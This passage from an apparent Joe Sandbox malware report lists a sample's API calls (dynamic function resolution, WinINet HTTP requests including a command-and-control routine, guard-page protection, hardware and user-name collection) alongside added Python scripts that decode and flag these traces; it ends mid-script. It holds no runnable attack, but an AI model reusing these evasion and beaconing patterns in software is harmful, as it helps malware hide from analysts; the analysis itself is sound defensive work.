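The three listings above (the GetProcAddress/LoadLibraryA resolver at 00E29BB0, the RtlAllocateHeap/VirtualProtect routine at 00E14610, and the WinINet GET routine at 00E162D0) can be read directly from the argument values Joe Sandbox prints: 0x100 in VirtualProtect's flNewProtect is PAGE_GUARD, HttpOpenRequestA's 0x00400100 is INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE, InternetSetOptionA option 0x1F is INTERNET_OPTION_SECURITY_FLAGS, HttpQueryInfoA level 0x13 is HTTP_QUERY_STATUS_CODE, InternetOpenA access type 1 is INTERNET_OPEN_TYPE_DIRECT, InternetConnectA service 3 is INTERNET_SERVICE_HTTP, and the 0x7CF passed to InternetReadFile is a 1999-byte read buffer. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses lines in the report's API-listing format and flags the GetProcAddress burst, the by-name resolution of NtQueryInformationProcess from ntdll, the PAGE_GUARD protection change, and the request parameters. Its sample input is constructed by copying entries from the listings above; the constant names come from winnt.h and wininet.h; the burst threshold (`min_resolves`) is an assumption.

```python
"""Decode a Joe Sandbox API listing into findings (added example, not report code).
Constants are from winnt.h / wininet.h; the burst threshold is an assumption."""
import re
from collections import Counter

# One "• API.MODULE(arg,arg,...), ref: ADDR" line; the leading bullet is optional.
API_LINE = re.compile(
    r"^\s*(?:[^\w\s]\s*)?(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")

PAGE_PROT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
PAGE_MODIFIERS = ((0x100, "PAGE_GUARD"), (0x200, "PAGE_NOCACHE"), (0x400, "PAGE_WRITECOMBINE"))
PAGE_GUARD = 0x100
INTERNET_FLAGS = ((0x80000000, "INTERNET_FLAG_RELOAD"), (0x04000000, "INTERNET_FLAG_NO_CACHE_WRITE"),
                  (0x00800000, "INTERNET_FLAG_SECURE"), (0x00400000, "INTERNET_FLAG_KEEP_CONNECTION"),
                  (0x00200000, "INTERNET_FLAG_NO_AUTO_REDIRECT"), (0x00000100, "INTERNET_FLAG_PRAGMA_NOCACHE"))
INTERNET_OPTION_SECURITY_FLAGS = 31
HTTP_QUERY_STATUS_CODE = 19

def parse_arg(tok):
    """'?' (unresolved) -> None, 8 hex digits -> int, anything else -> string literal."""
    tok = tok.strip()
    if tok == "?":
        return None
    return int(tok, 16) if HEX8.match(tok) else tok

def parse_calls(text):
    """One dict per direct API line: api, module, parsed args, call-site address."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:  # "Part of subcall function ..." entries do not match and are skipped
            args = [parse_arg(t) for t in m["args"].split(",")] if m["args"].strip() else []
            calls.append({"api": m["api"], "mod": m["mod"], "args": args, "ref": int(m["ref"], 16)})
    return calls

def decode_protect(value):
    """Name a flNewProtect value: base protection plus modifier bits such as PAGE_GUARD."""
    parts = [PAGE_PROT.get(value & 0xFF, "PAGE_0x%02x" % (value & 0xFF))] if value & 0xFF else []
    parts += [name for bit, name in PAGE_MODIFIERS if value & bit]
    return "|".join(parts) if parts else "0x%x" % value

def decode_flags(value, table):
    """Split a bitmask into the names in `table`; bits the table does not name stay as hex."""
    names = [name for bit, name in table if value & bit]
    rest = value
    for bit, _ in table:
        rest &= ~bit
    return names + (["0x%08x" % rest] if rest else [])

def triage(calls, min_resolves=5):
    """Return findings as strings; `min_resolves` is the assumed GetProcAddress burst threshold."""
    f = []
    gpa = [c for c in calls if c["api"] == "GetProcAddress" and len(c["args"]) >= 2]
    for base, n in Counter(c["args"][0] for c in gpa if isinstance(c["args"][0], int)).items():
        if n >= min_resolves:
            f.append("dynamic-resolution: %d GetProcAddress calls against module 0x%08x" % (n, base))
    for c in gpa:  # a readable Nt*/Zw* name is a native API resolved by string
        if isinstance(c["args"][1], str) and c["args"][1].startswith(("Nt", "Zw")):
            f.append("native-api-resolution: %s at 0x%08x" % (c["args"][1], c["ref"]))
    for c in calls:
        a = c["args"]
        if c["api"] == "VirtualProtect" and len(a) >= 3 and isinstance(a[2], int) and a[2] & PAGE_GUARD:
            f.append("guard-page: VirtualProtect size=%s prot=%s at 0x%08x" % (a[1], decode_protect(a[2]), c["ref"]))
        elif c["api"] == "HttpOpenRequestA" and len(a) >= 7 and isinstance(a[6], int):
            f.append("http-request: verb=%s flags=%s" % (a[1], "|".join(decode_flags(a[6], INTERNET_FLAGS))))
        elif c["api"] == "InternetSetOptionA" and len(a) >= 2 and a[1] == INTERNET_OPTION_SECURITY_FLAGS:
            f.append("http-request: INTERNET_OPTION_SECURITY_FLAGS set before the send (value not in trace)")
        elif c["api"] == "HttpQueryInfoA" and len(a) >= 2 and a[1] == HTTP_QUERY_STATUS_CODE:
            f.append("http-request: status code checked via HTTP_QUERY_STATUS_CODE")
        elif c["api"] == "InternetReadFile" and len(a) >= 3 and isinstance(a[2], int):
            f.append("http-request: response read in %d-byte chunks" % a[2])
    return f

# Constructed sample: entries copied from this report's API listings.
SAMPLE = """\
• GetProcAddress.KERNEL32(77190000,01A814B0), ref: 00E29BF1
• GetProcAddress.KERNEL32(77190000,01A81750), ref: 00E29C0A
• GetProcAddress.KERNEL32(77190000,01A81468), ref: 00E29C22
• GetProcAddress.KERNEL32(77190000,01A81588), ref: 00E29C3A
• GetProcAddress.KERNEL32(77190000,01A81498), ref: 00E29C53
• GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00E29F06
• VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00E147EC
• InternetOpenA.WININET(00E30DFF,00000001,00000000,00000000,00000000), ref: 00E16331
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E16385
• HttpOpenRequestA.WININET(00000000,GET,?,01A8EB30,00000000,00000000,00400100,00000000), ref: 00E163D5
• InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E1640F
• HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00E1644D
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E164BD
"""

if __name__ == "__main__":
    for finding in triage(parse_calls(SAMPLE)):
        print(finding)
```

Run it as a script to print the findings for the embedded sample, or pass the whole APIs section of a report to `parse_calls()`. Indirect entries ("Part of subcall function ...") are deliberately left unmatched so that only a routine's own calls are counted toward the resolution burst, and the InternetSetOptionA finding is kept neutral because the trace shows the option and buffer size but not the flag value written.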
                                        Strings
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                        • String ID: ERROR$ERROR$GET
                                        • API String ID: 3749127164-2509457195
                                        • Opcode ID: 856aa213519692172c4632bb981459b37699372400853122a2c803e7ebb56db0
                                        • Instruction ID: c4e84c6b741df3c6a0b6a97bc30696dd91f17776d1254b44ecdf1a6d682a8a0d
                                        • Opcode Fuzzy Hash: 856aa213519692172c4632bb981459b37699372400853122a2c803e7ebb56db0
                                        • Instruction Fuzzy Hash: 67717E71A00218EBDB24DFA4DC59BEEB7B5BF44700F1094A8F10A7B184DBB56A84CF51
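The stack values Joe Sandbox prints for WinINet calls are raw DWORDs, and the two network routines in this report (the GET routine above and the C2 request routine at 0xE148D0 further down) are easier to read once those constants are named. The script below is an added example for reading such "APIs" listings; it is not Joe Sandbox code and not code from the sample. The constant names come from wininet.h and windows.h, the embedded sample lines are copied from this report, and the only interpretation the script adds on its own is that a request opened without INTERNET_FLAG_SECURE goes out as plaintext HTTP.

```python
"""Decode WinINet/kernel32 call lines from a Joe Sandbox "APIs" listing (added example)."""
import re
from typing import Dict, List, Optional, Union

Arg = Union[int, str, None]
# One trace line: "• Api.DLL(arg,arg,...), ref: 00E1640F"
LINE_RE = re.compile(r"^•?\s*(?P<api>\w+)\.(?P<dll>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

# Constructed input: lines copied from this report's two WinINet routines and its HWID routine.
SAMPLE_TRACE = """\
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E14965
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E14B0A
• HttpOpenRequestA.WININET(00000000,01A8F2D8,?,01A8EB30,00000000,00000000,00400100,00000000), ref: 00E14B65
• HttpOpenRequestA.WININET(00000000,GET,?,01A8EB30,00000000,00000000,00400100,00000000), ref: 00E163D5
• InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E1640F
• HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00E1644D
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E164BD
• GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00E276D2
"""
# Constants from wininet.h / windows.h.
HTTP_OPEN_REQUEST_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE", 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT", 0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00000200: "INTERNET_FLAG_NO_UI", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
OPEN_TYPES = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}
SERVICES = {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}
OPTIONS = {0x02: "INTERNET_OPTION_CONNECT_TIMEOUT", 0x1F: "INTERNET_OPTION_SECURITY_FLAGS"}
QUERY_LEVELS = {0x05: "HTTP_QUERY_CONTENT_LENGTH", 0x13: "HTTP_QUERY_STATUS_CODE", 0x16: "HTTP_QUERY_RAW_HEADERS_CRLF"}
MAX_PATH = 0x104
INTERNET_FLAG_SECURE = 0x00800000

def parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None                      # not a constant at the call site
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)              # DWORD or pointer as it sat on the stack
    return tok                           # string the sandbox could resolve, e.g. GET

def parse_line(line: str) -> Optional[dict]:
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    raw = m.group("args")
    args = [parse_arg(t) for t in raw.split(",")] if raw else []
    return {"api": m.group("api"), "dll": m.group("dll"), "args": args, "ref": int(m.group("ref"), 16)}

def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
    """Names of the set bits; bits the table does not know are kept as a hex remainder."""
    names = [name for bit, name in table.items() if value & bit]
    known = 0
    for bit in table:
        known |= bit
    rest = value & ~known & 0xFFFFFFFF
    return names + ([f"0x{rest:08X}"] if rest else [])

def _name(table: Dict[int, str], v: Arg) -> str:
    if v is None:
        return "?"
    return v if isinstance(v, str) else table.get(v, f"0x{v:08X}")

def describe(call: dict) -> str:
    api, a = call["api"], call["args"]

    def arg(i: int) -> Arg:
        return a[i] if i < len(a) else None

    if api == "InternetOpenA":
        return f"InternetOpenA: access={_name(OPEN_TYPES, arg(1))}"
    if api == "InternetConnectA":
        port = "?" if arg(2) is None else str(arg(2))
        return f"InternetConnectA: port={port} service={_name(SERVICES, arg(5))}"
    if api == "HttpOpenRequestA":
        verb = arg(1)
        verb_s = verb if isinstance(verb, str) else f"ptr {_name(dict(), verb)} (string not in trace)"
        flags = arg(6) if isinstance(arg(6), int) else 0
        tls = "TLS" if flags & INTERNET_FLAG_SECURE else "plain HTTP (INTERNET_FLAG_SECURE clear)"
        names = "|".join(decode_flags(flags, HTTP_OPEN_REQUEST_FLAGS)) or "0"
        return f"HttpOpenRequestA: verb={verb_s} flags={names} -> {tls}"
    if api == "InternetSetOptionA":
        return f"InternetSetOptionA: option={_name(OPTIONS, arg(1))} len={arg(3)}"
    if api == "HttpQueryInfoA":
        return f"HttpQueryInfoA: level={_name(QUERY_LEVELS, arg(1))}"
    if api == "InternetReadFile":
        return f"InternetReadFile: chunk={arg(2)} bytes"
    if api == "GetWindowsDirectoryA":
        return f"GetWindowsDirectoryA: size={arg(1)}" + (" (MAX_PATH)" if arg(1) == MAX_PATH else "")
    return f"{api}.{call['dll']}: {a}"

def summarize(trace: str) -> List[str]:
    """One decoded line per recognised trace line, prefixed with the call-site address."""
    out = []
    for line in trace.splitlines():
        call = parse_line(line)
        if call:
            out.append(f"{call['ref']:08X} {describe(call)}")
    return out
```

Run over the copied lines, `summarize(SAMPLE_TRACE)` reports INTERNET_OPEN_TYPE_DIRECT (no proxy), INTERNET_SERVICE_HTTP on a non-constant port, HttpOpenRequestA with INTERNET_FLAG_KEEP_CONNECTION|INTERNET_FLAG_PRAGMA_NOCACHE and INTERNET_FLAG_SECURE clear, InternetSetOptionA with INTERNET_OPTION_SECURITY_FLAGS and a 4-byte buffer, HttpQueryInfoA with HTTP_QUERY_STATUS_CODE, 1999-byte InternetReadFile chunks and a MAX_PATH buffer for GetWindowsDirectoryA. A 4-byte buffer passed to option 31 is the usual shape of SECURITY_FLAG_IGNORE_* bits being set, but the buffer contents show as ? in the trace, so that remains unconfirmed by this report.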

                                         Control-flow Graph (rendered graph not reproduced): function 0xE27690-0xE2781E. Blocks call GetWindowsDirectoryA, then GetVolumeInformationA followed by three calls to subfunction 0xE28E90 and a loop over 0xE28E90, then GetProcessHeap and RtlAllocateHeap; of the two exit branches one calls wsprintfA before subfunction 0xE2AA50, the other calls 0xE2AA50 directly.
                                        APIs
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00E276D2
                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E2770F
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27793
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E2779A
                                        • wsprintfA.USER32 ref: 00E277D0
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: the same fifteen dumps (0000000000E10000 through 000000000155B000) listed for the function above
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                        • String ID: :$C$\
                                        • API String ID: 1544550907-3809124531
                                        • Opcode ID: 56cdd2fbe7e046886a2734f6f49b43f23c1520bad4bd4cbe96a852002ce5ee5b
                                        • Instruction ID: 9314d6c8cf8f6da73509669ceab96930632d82679c34464b3b1091409054f514
                                        • Opcode Fuzzy Hash: 56cdd2fbe7e046886a2734f6f49b43f23c1520bad4bd4cbe96a852002ce5ee5b
                                        • Instruction Fuzzy Hash: B741B4B1D04358DBDB10DF94DC45BDEBBB8AF08704F141099F649BB280D775AA44CBA5
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E111B7), ref: 00E27A10
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E27A17
                                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E27A2F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: the same fifteen dumps (0000000000E10000 through 000000000155B000) listed for the first function above
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateNameProcessUser
                                        • String ID:
                                        • API String ID: 1296208442-0
                                        • Opcode ID: da5d5cb3fc5e1cc9fcb06ae46cd422c7e118c4875a3832488d7028b8acbb948d
                                        • Instruction ID: d3ede0110cac9f483804dd3cb0a311a6c1f910bb14af6d5ccc433300715b13cf
                                        • Opcode Fuzzy Hash: da5d5cb3fc5e1cc9fcb06ae46cd422c7e118c4875a3832488d7028b8acbb948d
                                        • Instruction Fuzzy Hash: 77F04FB1D44209EBC710DF99DD45BAEFBB8EB05B21F10025AFA15A6680C77955008BE1
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: the same fifteen dumps (0000000000E10000 through 000000000155B000) listed for the first function above
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitInfoProcessSystem
                                        • String ID:
                                        • API String ID: 752954902-0
                                        • Opcode ID: df547dcf61afa436f9f10a10a31eae7ddd94e14ed30ab2c05c05484945590845
                                        • Instruction ID: e4c8b68684d2bc94604d5e1cd7de91396804c51975ee27b898ac5b5e086a96ef
                                        • Opcode Fuzzy Hash: df547dcf61afa436f9f10a10a31eae7ddd94e14ed30ab2c05c05484945590845
                                        • Instruction Fuzzy Hash: E7D05E74A0030CABCB14DFE598496DDBBB9FB08715F0005D8D90572240EA319481CBA5

                                         Control-flow Graph (rendered graph not reproduced): function 0xE29F20-0xE2AA19, the API resolver. An initial run of 43 GetProcAddress calls, then 8 LoadLibraryA calls, then further GetProcAddress groups of 5, 8, 5, 6, 9, 5, 2, 2, 10, 4, 1 and 4 calls; every group, the first included, sits behind a conditional branch that can skip it.
                                        APIs
                                        • GetProcAddress.KERNEL32(77190000,01A76498), ref: 00E29F3D
                                        • GetProcAddress.KERNEL32(77190000,01A764B8), ref: 00E29F55
                                        • GetProcAddress.KERNEL32(77190000,01A88F60), ref: 00E29F6E
                                        • GetProcAddress.KERNEL32(77190000,01A88F30), ref: 00E29F86
                                        • GetProcAddress.KERNEL32(77190000,01A88FA8), ref: 00E29F9E
                                        • GetProcAddress.KERNEL32(77190000,01A8D0F0), ref: 00E29FB7
                                        • GetProcAddress.KERNEL32(77190000,01A7A538), ref: 00E29FCF
                                        • GetProcAddress.KERNEL32(77190000,01A8D2B8), ref: 00E29FE7
                                        • GetProcAddress.KERNEL32(77190000,01A8D300), ref: 00E2A000
                                        • GetProcAddress.KERNEL32(77190000,01A8D0D8), ref: 00E2A018
                                        • GetProcAddress.KERNEL32(77190000,01A8D0C0), ref: 00E2A030
                                        • GetProcAddress.KERNEL32(77190000,01A766B8), ref: 00E2A049
                                        • GetProcAddress.KERNEL32(77190000,01A764F8), ref: 00E2A061
                                        • GetProcAddress.KERNEL32(77190000,01A766D8), ref: 00E2A079
                                        • GetProcAddress.KERNEL32(77190000,01A76758), ref: 00E2A092
                                        • GetProcAddress.KERNEL32(77190000,01A8D138), ref: 00E2A0AA
                                        • GetProcAddress.KERNEL32(77190000,01A8D180), ref: 00E2A0C2
                                        • GetProcAddress.KERNEL32(77190000,01A7A560), ref: 00E2A0DB
                                        • GetProcAddress.KERNEL32(77190000,01A765B8), ref: 00E2A0F3
                                        • GetProcAddress.KERNEL32(77190000,01A8D2D0), ref: 00E2A10B
                                        • GetProcAddress.KERNEL32(77190000,01A8D048), ref: 00E2A124
                                        • GetProcAddress.KERNEL32(77190000,01A8D1F8), ref: 00E2A13C
                                        • GetProcAddress.KERNEL32(77190000,01A8D150), ref: 00E2A154
                                        • GetProcAddress.KERNEL32(77190000,01A76578), ref: 00E2A16D
                                        • GetProcAddress.KERNEL32(77190000,01A8D2E8), ref: 00E2A185
                                        • GetProcAddress.KERNEL32(77190000,01A8D060), ref: 00E2A19D
                                        • GetProcAddress.KERNEL32(77190000,01A8D228), ref: 00E2A1B6
                                        • GetProcAddress.KERNEL32(77190000,01A8D318), ref: 00E2A1CE
                                        • GetProcAddress.KERNEL32(77190000,01A8D2A0), ref: 00E2A1E6
                                        • GetProcAddress.KERNEL32(77190000,01A8D168), ref: 00E2A1FF
                                        • GetProcAddress.KERNEL32(77190000,01A8D198), ref: 00E2A217
                                        • GetProcAddress.KERNEL32(77190000,01A8D108), ref: 00E2A22F
                                        • GetProcAddress.KERNEL32(77190000,01A8D030), ref: 00E2A248
                                        • GetProcAddress.KERNEL32(77190000,01A7F988), ref: 00E2A260
                                        • GetProcAddress.KERNEL32(77190000,01A8D1B0), ref: 00E2A278
                                        • GetProcAddress.KERNEL32(77190000,01A8D1C8), ref: 00E2A291
                                        • GetProcAddress.KERNEL32(77190000,01A764D8), ref: 00E2A2A9
                                        • GetProcAddress.KERNEL32(77190000,01A8D258), ref: 00E2A2C1
                                        • GetProcAddress.KERNEL32(77190000,01A76518), ref: 00E2A2DA
                                        • GetProcAddress.KERNEL32(77190000,01A8D078), ref: 00E2A2F2
                                        • GetProcAddress.KERNEL32(77190000,01A8D090), ref: 00E2A30A
                                        • GetProcAddress.KERNEL32(77190000,01A76778), ref: 00E2A323
                                        • GetProcAddress.KERNEL32(77190000,01A76538), ref: 00E2A33B
                                        • LoadLibraryA.KERNEL32(01A8D120,?,00E25EF3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE7), ref: 00E2A34D
                                        • LoadLibraryA.KERNEL32(01A8D0A8,?,00E25EF3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE7), ref: 00E2A35E
                                        • LoadLibraryA.KERNEL32(01A8D1E0,?,00E25EF3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE7), ref: 00E2A370
                                        • LoadLibraryA.KERNEL32(01A8D210,?,00E25EF3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE7), ref: 00E2A382
                                        • LoadLibraryA.KERNEL32(01A8D240,?,00E25EF3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE7), ref: 00E2A393
                                        • LoadLibraryA.KERNEL32(01A8D270,?,00E25EF3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE7), ref: 00E2A3A5
                                        • LoadLibraryA.KERNEL32(01A8D288,?,00E25EF3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE7), ref: 00E2A3B7
                                        • LoadLibraryA.KERNEL32(01A8D5B8,?,00E25EF3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE7), ref: 00E2A3C8
                                        • GetProcAddress.KERNEL32(77040000,01A762F8), ref: 00E2A3EA
                                        • GetProcAddress.KERNEL32(77040000,01A8D378), ref: 00E2A402
                                        • GetProcAddress.KERNEL32(77040000,01A88878), ref: 00E2A41A
                                        • GetProcAddress.KERNEL32(77040000,01A8D4B0), ref: 00E2A433
                                        • GetProcAddress.KERNEL32(77040000,01A76258), ref: 00E2A44B
                                        • GetProcAddress.KERNEL32(73D20000,01A7A588), ref: 00E2A470
                                        • GetProcAddress.KERNEL32(73D20000,01A76278), ref: 00E2A489
                                        • GetProcAddress.KERNEL32(73D20000,01A7A218), ref: 00E2A4A1
                                        • GetProcAddress.KERNEL32(73D20000,01A8D420), ref: 00E2A4B9
                                        • GetProcAddress.KERNEL32(73D20000,01A8D588), ref: 00E2A4D2
                                        • GetProcAddress.KERNEL32(73D20000,01A76198), ref: 00E2A4EA
                                        • GetProcAddress.KERNEL32(73D20000,01A76138), ref: 00E2A502
                                        • GetProcAddress.KERNEL32(73D20000,01A8D528), ref: 00E2A51B
                                        • GetProcAddress.KERNEL32(768D0000,01A761B8), ref: 00E2A53C
                                        • GetProcAddress.KERNEL32(768D0000,01A76378), ref: 00E2A554
                                        • GetProcAddress.KERNEL32(768D0000,01A8D3C0), ref: 00E2A56D
                                        • GetProcAddress.KERNEL32(768D0000,01A8D390), ref: 00E2A585
                                        • GetProcAddress.KERNEL32(768D0000,01A76178), ref: 00E2A59D
                                        • GetProcAddress.KERNEL32(75790000,01A7A268), ref: 00E2A5C3
                                        • GetProcAddress.KERNEL32(75790000,01A7A5B0), ref: 00E2A5DB
                                        • GetProcAddress.KERNEL32(75790000,01A8D468), ref: 00E2A5F3
                                        • GetProcAddress.KERNEL32(75790000,01A76398), ref: 00E2A60C
                                        • GetProcAddress.KERNEL32(75790000,01A76338), ref: 00E2A624
                                        • GetProcAddress.KERNEL32(75790000,01A7A6C8), ref: 00E2A63C
                                        • GetProcAddress.KERNEL32(75A10000,01A8D5A0), ref: 00E2A662
                                        • GetProcAddress.KERNEL32(75A10000,01A76318), ref: 00E2A67A
                                        • GetProcAddress.KERNEL32(75A10000,01A888F8), ref: 00E2A692
                                        • GetProcAddress.KERNEL32(75A10000,01A8D360), ref: 00E2A6AB
                                        • GetProcAddress.KERNEL32(75A10000,01A8D5D0), ref: 00E2A6C3
                                        • GetProcAddress.KERNEL32(75A10000,01A763D8), ref: 00E2A6DB
                                        • GetProcAddress.KERNEL32(75A10000,01A763B8), ref: 00E2A6F4
                                        • GetProcAddress.KERNEL32(75A10000,01A8D3D8), ref: 00E2A70C
                                        • GetProcAddress.KERNEL32(75A10000,01A8D570), ref: 00E2A724
                                        • GetProcAddress.KERNEL32(76850000,01A76018), ref: 00E2A746
                                        • GetProcAddress.KERNEL32(76850000,01A8D4E0), ref: 00E2A75E
                                        • GetProcAddress.KERNEL32(76850000,01A8D3A8), ref: 00E2A776
                                        • GetProcAddress.KERNEL32(76850000,01A8D5E8), ref: 00E2A78F
                                        • GetProcAddress.KERNEL32(76850000,01A8D438), ref: 00E2A7A7
                                        • GetProcAddress.KERNEL32(75690000,01A76298), ref: 00E2A7C8
                                        • GetProcAddress.KERNEL32(75690000,01A76038), ref: 00E2A7E1
                                        • GetProcAddress.KERNEL32(769C0000,01A76158), ref: 00E2A802
                                        • GetProcAddress.KERNEL32(769C0000,01A8D600), ref: 00E2A81A
                                        • GetProcAddress.KERNEL32(6F8C0000,01A762B8), ref: 00E2A840
                                        • GetProcAddress.KERNEL32(6F8C0000,01A76218), ref: 00E2A858
                                        • GetProcAddress.KERNEL32(6F8C0000,01A76058), ref: 00E2A870
                                        • GetProcAddress.KERNEL32(6F8C0000,01A8D408), ref: 00E2A889
                                        • GetProcAddress.KERNEL32(6F8C0000,01A763F8), ref: 00E2A8A1
                                        • GetProcAddress.KERNEL32(6F8C0000,01A76238), ref: 00E2A8B9
                                        • GetProcAddress.KERNEL32(6F8C0000,01A76118), ref: 00E2A8D2
                                        • GetProcAddress.KERNEL32(6F8C0000,01A761D8), ref: 00E2A8EA
                                        • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 00E2A901
                                        • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 00E2A917
                                        • GetProcAddress.KERNEL32(75D90000,01A8D618), ref: 00E2A939
                                        • GetProcAddress.KERNEL32(75D90000,01A88868), ref: 00E2A951
                                        • GetProcAddress.KERNEL32(75D90000,01A8D330), ref: 00E2A969
                                        • GetProcAddress.KERNEL32(75D90000,01A8D498), ref: 00E2A982
                                        • GetProcAddress.KERNEL32(76470000,01A76078), ref: 00E2A9A3
                                        • GetProcAddress.KERNEL32(6D900000,01A8D348), ref: 00E2A9C4
                                        • GetProcAddress.KERNEL32(6D900000,01A76358), ref: 00E2A9DD
                                        • GetProcAddress.KERNEL32(6D900000,01A8D3F0), ref: 00E2A9F5
                                        • GetProcAddress.KERNEL32(6D900000,01A8D450), ref: 00E2AA0D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: the same fifteen dumps (0000000000E10000 through 000000000155B000) listed for the first function above
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: HttpQueryInfoA$InternetSetOptionA
                                        • API String ID: 2238633743-1775429166
                                        • Opcode ID: 2ce2ec86cd326e8e0f390af4be992833431f169ec6629df15bb025694888a32c
                                        • Instruction ID: d237ed173dd5dfb64cc892abd2b36ee81bb740d8b28ff38998d6b5eba20d352a
                                        • Opcode Fuzzy Hash: 2ce2ec86cd326e8e0f390af4be992833431f169ec6629df15bb025694888a32c
                                        • Instruction Fuzzy Hash: A46220B55002009FC374DFAAF88895677FAE79DF01710859AFA89CB258D73FA541CBA0
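Of the 104 GetProcAddress calls in the resolver above, only two pass a name the sandbox could print (InternetSetOptionA, HttpQueryInfoA); the other 102, and all eight LoadLibraryA calls, pass pointers in the 0x01A7xxxx-0x01A8xxxx range, above the start of every region listed under Memory Dump Source, which points to names assembled at runtime rather than stored in the image (an inference from the addresses, not something the trace states). The script below, an added example and not Joe Sandbox or sample code, groups the calls by module handle and counts how many names are recoverable from the trace alone. Handles are left as handles: the loaded-module list that maps them to DLL names sits elsewhere in the report, not in this section. The embedded input is a constructed excerpt of the lines above, and the dump-region boundary it uses is the highest region start listed in this report.

```python
"""Group a Joe Sandbox GetProcAddress/LoadLibraryA trace by module handle (added example)."""
import re
from collections import OrderedDict
from typing import List, Tuple, Union

LINE_RE = re.compile(
    r"^•?\s*(?P<api>GetProcAddress|LoadLibraryA)\.KERNEL32\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
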